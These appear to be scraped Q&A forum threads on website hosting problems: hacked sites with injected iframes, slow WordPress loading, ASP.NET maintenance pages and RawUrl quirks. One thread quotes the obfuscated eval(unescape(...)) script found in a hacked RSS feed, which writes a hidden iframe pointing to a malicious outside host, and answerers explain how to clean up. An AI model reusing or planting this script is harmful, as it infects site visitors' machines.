my site is hosted in lunarpage and it geting hacked in from few month.
i have done all things some of site saying (changing password like).
finally 2 weeks ago i have blocked all ranges of Chinese ips.
but today it again hacked.
is there is any way to prevent Iframe hack?
If you're changing your passwords and the site still gets hacked, you might have a virus on your machine. I am not joking, I saw this once.
Just to make sure, request the FTP logs from the hosting (you may see some other machines connecting to your account)
Given your comment
Iframe hack is famos sql injection
attack. mainly from .cn domains
Identify SQL injection vulnerabilities in your system
Close them (switching to parametrised queries is a good idea if you haven't already)
You could also use mod_security or similar to try to stop attacks before they get to your web application. I've experienced false positives though (as a user, and only with ASP.NET systems (note this is a tiny sample size)).
The question isn't so much about the iframe as how it got there and how to get rid of it. I believe what has happened is that you have stored your passwords in your FTP client. You have a trojan on your computer and it mines the passwords from the FTP client and then uploads the iframe to your index file. Also check your 404 file, if you have one. It will likely be there, too.
Here's what you need to do. First, get rid of the trojan on your computer. I suggest looking for this, "PWS:Win32/Daurso.gen!A" and delete it. Then go to your site(s) and remove the iframe from all pages. Next, change all of your passwords. Lastly, do not store the new passwords in your FTP client or anywhere else on your computer.
By the way, don't visit the URL listed in the iframe. It loads a ton of spyware. To get rid of spyware, I suggest using Malwarebytes (free). Use the full scan when you have time. It takes a long time (hours), if you have a lot of files.
Good luck.
Related
I just picked up a client who's Wordpress web site takes anywhere between 8 to 22 seconds to START loading. The loading delay also occurs when using the Wordpress backend so I'd like to fix the loading issue first before starting my work (template re-design). What's the quickest yet efficient way to determine why this Wordpress site is taking so long to start loading?
Thanks in advance
P.S. - They currently have a caching plugin installed (WP Super Cache) which I assume the previous web developer installed to help with the loading issue but it only helps with the front-end and not the back-end.
Try to run some test like YSlow and Google Page Speed and read their results and suggestions.
Google Speed Online is helping me a lot with analysis of my websites.
http://pagespeed.googlelabs.com/
I use browsermob. They use real browsers to test the site load performance. Shows very nice graphs showing how long each and every request took. Also shows how many requests happen in parallel. As they use real browser, you can see how long it will take to load on a real browser. Then you can choose from which location you want to test. You can choose a UK location to test how fast your page loads from UK.
By the way, I am in no way related to browsermob. I just happen to be a satisfied user of this.
And it is free.
Your server is probably loading far too many modules and is thrashing the disks as it's run out of memory.
You need to both reduce how much memory each PHP instance consumes and limit how many PHP instances can run simultanouesly to ensure you don't use virtual memory for your PHP instances.
I've written a detailed answer to a very similar problem here on Stack Overflow:
How can I figure out why my Wordpress pages load so slowly?
Well, i have came across a similar situation, such things happen when your website is hosted on a GridHosting server, which means it changes according to the server load, but sometimes the things are just opposite the scenario, the best way to check why it is slow is to first ping the website at random interval , so in this way you will know if the distance is the cause or the packet dropping is the issue, secondly, you need to make sure your server's configurations is good, i.e; request your host about a RAW log of your website, in this way you can know what is it taking long for your server to response, and the least best method is to check and make sure that your DNS resolves in a good time, and try to use some free CDN services like CloudFlare.
Hope this helps.
I have an ASP.NET site that I'm going to have to take down to make some major structural updates to, and I was wondering how I should go about it from the client-side perspective. I have heard of an App_Offline.htm file or something like that, but I've never really gotten that to successfully work. Does anyone know how to do this?
EDIT
My app is running ASP.NET 4.0, for what it is worth.
Rather than messing with the app_offline silliness (among other reasons, you can't continue to see the site internally while performing maintenance), I created an additional "down for maintenance" site in IIS, which is normally stopped. It has the same IP, host headers, etc as the main site, but only has a default.aspx, an images folder and a stylesheet. That file contains the "This site will be down for maintenance until xx:xx PM CST" message.
When I'm ready to perform the update, I stop the main site and start the maintenance site, which then processes any requests it receives and, of course, returns the maintenance message.
When the maintenance is complete, stop the maintenance placeholder site, and restart your main site.
If you're using host headers, you can modify this approach so that the site remains internally accessible over your LAN/WAN while the maintenance site is handling external requests. A simple approach is to remove the host headers for <*>.yourdomain.com from the main site before starting the maintenance site, and ensure that the main site has an additional host header that is internally accessible (added to your local hosts file, for instance). When you start the maintenance site, it'll handle external requests while the primary site will handle requests to the internal-only header.
Alternatively (this seems complex, but saves you the trouble of adding and removing headers), create three sites:
Main site: Configured as in normal operation.
Maintenance site: Has same IP, host headers, etc as main site, but only contains default "down for maintenance" page and any images, css, etc that are required.
Internal test site: Duplicates the configuration of the main site and points to the same folders, but only has host headers,etc for an internal name that is not in the public DNS.
This way, you have only to stop the main site and start the other two in order to funnel external traffic to the "down for maintenance" site, while you can still see and tweak the primary site. This is helpful for that last few minutes of testing/bug fixing that tends to come up during a deployment.
Update
If you don't have access to the server or IIS Manager, you most likely won't be able to use any of that. Assuming that your access is limited to your own folder, your options seem to be either to deploy app_offline.htm to the root of the site (ASP.NET checks for that filename), or to just replace the whole site with a "down for maintenance" app. Perhaps someone else will chime in with alternatives.
The trick for IE is to push over the wire particular count of bytes otherwise IE shows not so friendly 404 error anyway. here is more details: http://weblogs.asp.net/scottgu/archive/2006/04/09/442332.aspx
If you have a good pre-release testing process and careful release procedures you probably won't be down for long.
In that case dropping a file called App_Offline.htm into your site root works fine. IIS will replace your site with it until you remove it. It's a painless way of making sure nothing's updating while you transition.
Mine just has a header with the site logo and a message that we'll be down for maintenance for up to twenty minutes. That's it. It took me about five minutes to write IIRC.
I would definitely recommend this for short sharp down periods of less than half an hour. Anything longer and you're probably looking at a major system change that warrants an approach like David Lively's.
Usually when I get the url of a request i use Request.RawUrl.
This gives /default.aspx for example.
However recently my host changed something and now the name of the application directory is displayed as well so i get /appdirname/default.aspx.
Now why does it give me the directory of the application? It looks as if my website is a subapplication of another website. So when you go to mydomain.com the rawurl will be:
/appdirname/default.aspx
I believe each domain has it's own website defined in iis or am i mistaken.
I am not asking for a workaround, which should be pretty straightforward, I am asking why this is happening and how, what kind of IIS setup causes this to happen?
PS.
And the worst part is i had this issue with godaddy and i was happy my host didnt have it but now both hosts have the same problem.
The Request.RawUrl method returns everything after the domain declaration, so if your full url is:
http://www.yourdomain.com:8080/directory/Page.aspx
then the method will return
/directory/Page.aspx
That's all it does. That's all it claims to do. As you say, your hosting provider must have changed something, which is very naughty, and the workaround should be easy. There is a good chance that they have introduced some kind of url redirection, but the best way to find out is to get in touch with their helpdesk and ask them what is happening. I find that most successful hosting companies tend to respond in good time to this kind of question. Otherwise they tend to become formerly-successful hosting companies.
Ric Strahl has this to say about it: http://www.west-wind.com/weblog/posts/132081.aspx
My feed is broken: Feed Validator says this portion is the problem. Any thoughts?
]]>content:encoded>
wfw:commentRss>http://sweatingthebigstuff.com/2010/01/21/5-steps-to-get-out-of-debt/feed/wfw:commentRss>
slash:comments>2/slash:comments>
/item>
/channel>
/rss>
script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>
<script language="javascript">eval(unescape("%64%6F%63...
You've been hacked. An attacker has compromised your site and added this script to the bottom of some of your pages (probably all of them, judging by your main site). It loads a bunch of exploit code against web-browsers and plugins that attempts to infect other people's computers. That it also results in the RSS being invalid is a side-effect.
You need to get the site off-line before it infects more people, then work on the clean-up, which will depend on how they compromised it/what kind of server it is. Certainly at the very least you will need to delete your current site code and upload fresh new scripts, from a machine you know is clean(*), with all your passwords changed. If it's your your own [virtual] server you will need to check that the server itself hasn't been rooted.
(*: a very common way sites are getting compromised at the moment is through hacked client machines running FTP. The trojans steal the FTP passwords when you connect. So you need to check and disinfect every machine you might have used to connect to the site. And if you find anything suspicious on one of them, don't trust AV tools to completely clean it, because today they just can't keep up with the quantity of malcode out there. Re-install the operating system instead.)
I have a website which google blocked because it had badware i removed the viruses from the server and its completely clean now, the problem that this virus changed in the html, js asp files in the site and added hidden iframes and strange scripts, i removed all what i found in the diles, but the website is toooo big, so any one have any tool which i can use to remove all the effects of this badware?
google gave me this site as a reference to remove the badware from my site
http://www.stopbadware.org/home/security
Thanks,
Wipe everything from the server, check all the files, and re upload them if they're clean. Only thing you can do.
Upload the latest version of the site from your source control DB. If you dont follow source control, its high time you start doing it. ;-)
Find a good search and replace tool. If you are using Dream weaver then you can do a site wide search. The same is applicable to Visual Interdev as well.
+1 William's comment. You can do a simple grep for characteristic strings your particular infection has left behind, such as “<iframe” or the start of the encoded scripts, but you can't be sure to find all the changes that have happened without a manual inspection. This is what having a clean copy on your local computer is for.
i removed the viruses from the server
Really? Are you clean of rootkits? How can you be sure? After an infection, the only sure-fire way to recover a clean server is to reinstall everything on it from the operating system upwards.
Have you discovered and fixed the method the intruders used to get in? If not, you can be sure another of the Russian malware gangs' automated exploits will be back soon enough.
Try soswebscan
scan your website at free of cost with soswebscan.
For more details visit soswebscan website : http://soswebscan.jobandproject.com